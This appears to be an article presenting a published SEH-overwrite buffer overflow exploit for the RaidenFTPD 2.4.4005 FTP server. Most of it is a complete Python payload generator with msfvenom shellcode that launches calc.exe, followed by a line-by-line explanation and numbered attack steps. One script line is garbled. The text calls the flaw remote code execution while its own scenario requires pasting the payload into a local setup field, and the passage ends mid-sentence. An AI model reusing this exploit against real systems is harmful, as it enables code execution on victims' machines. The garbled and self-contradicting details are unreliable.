RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)

RaidenFTPD 2.4.4005 Buffer Overflow Vulnerability: Exploiting SEH for Remote Code Execution

On July 18, 2023, cybersecurity researcher Andre Nogueira disclosed a critical buffer overflow vulnerability in RaidenFTPD 2.4.4005, a popular FTP server software for Windows. This flaw, rooted in improper input validation during the setup wizard process, enables attackers to achieve remote code execution through a structured exception handler (SEH) overwrite technique. The exploit leverages a well-known method in Windows exploit development, making it both accessible and dangerous for unpatched systems.

Understanding the Vulnerability

RaidenFTPD is a lightweight FTP daemon designed for personal and small-scale deployments. While it offers simplicity and ease of use, its lack of robust input sanitization creates a high-risk attack surface. The vulnerability arises during the Step by Step Setup Wizard — a configuration interface where users enter server details, including the Server name field.

When an attacker inputs a crafted payload into the Server name field, the application fails to properly validate the length of the input. This leads to a stack-based buffer overflow, where excessive data overwrites adjacent memory structures, including the SEH chain — a critical component of Windows exception handling.

Exploitation Mechanism: SEH Overwrite

Structured Exception Handler (SEH) is a Windows mechanism used to handle runtime exceptions. Each thread maintains a SEH chain, where handlers are linked via pointers. The exploit targets this chain by placing a malicious SEH pointer at the top of the chain.

Attackers use a short jump (0xEB 0x06) to redirect execution to the payload after an exception is triggered. The SEH handler is set to a known, predictable address — in this case, 0x7c1e76ff — which points to a pop eax; pop esi; ret; instruction in msvcp70.dll. This library is commonly present in Windows installations and is reliable for exploitation.

Once the SEH chain is overwritten, a controlled exception (such as a null pointer dereference) triggers the malicious handler, leading to execution of the shellcode.

Exploit Code Analysis

#!/usr/bin/env python3
from struct import pack

crash = 2000
offset = 497

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" 
shellcode = b"\x90" * 8
shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"

nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
SEH = pack(" msvcp70.dll

buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash - len(buffer))

file_payload = open("exploit-raiden.txt", 'wb')
print("[*] Creating the .txt file for out payload")
file_payload.write(buffer)
print("[*] Writing malicious payload to the .txt file")
file_payload.close()

Explanation: This Python script generates a malicious payload designed to exploit the buffer overflow in RaidenFTPD. The core logic is as follows:

• offset = 497: This is the offset from the start of the buffer to the SEH pointer. It was determined through fuzzing and debugging (e.g., using tools like Immunity Debugger or WinDbg).
• nSEH = b"\xeb\x06\x90\x90": A short jump instruction (0xEB 0x06) that jumps 8 bytes forward. The two NOPs (0x90) are padding to ensure alignment.
• SEH = pack("<L", 0x7c1e76ff): The SEH pointer is set to a known, reliable address in msvcp70.dll. This library is widely used and present in most Windows systems.
• shellcode: A shellcode generated via msfvenom to execute calc.exe. The --b "\x00\x0d" flag excludes null bytes and carriage returns, which can disrupt input parsing.
• buffer += b"D" * (crash - len(buffer)): Ensures the total payload length reaches 2000 bytes, which triggers the crash condition.

This payload is saved to exploit-raiden.txt, which is then pasted into the Server name field during the setup wizard.

Attack Scenario and Impact

An attacker can follow these steps:

1. Install RaidenFTPD 2.4.4005 on a target Windows 10 system (Build 19045).
2. Launch the application and navigate to Setup → Step by Step Setup Wizard.
3. Copy the contents of exploit-raiden.txt into the Server name field.
4. Click Next → Next → OK.
5. Upon completion, the system will execute calc.exe, indicating successful exploitation.

While the payload executes calc.exe as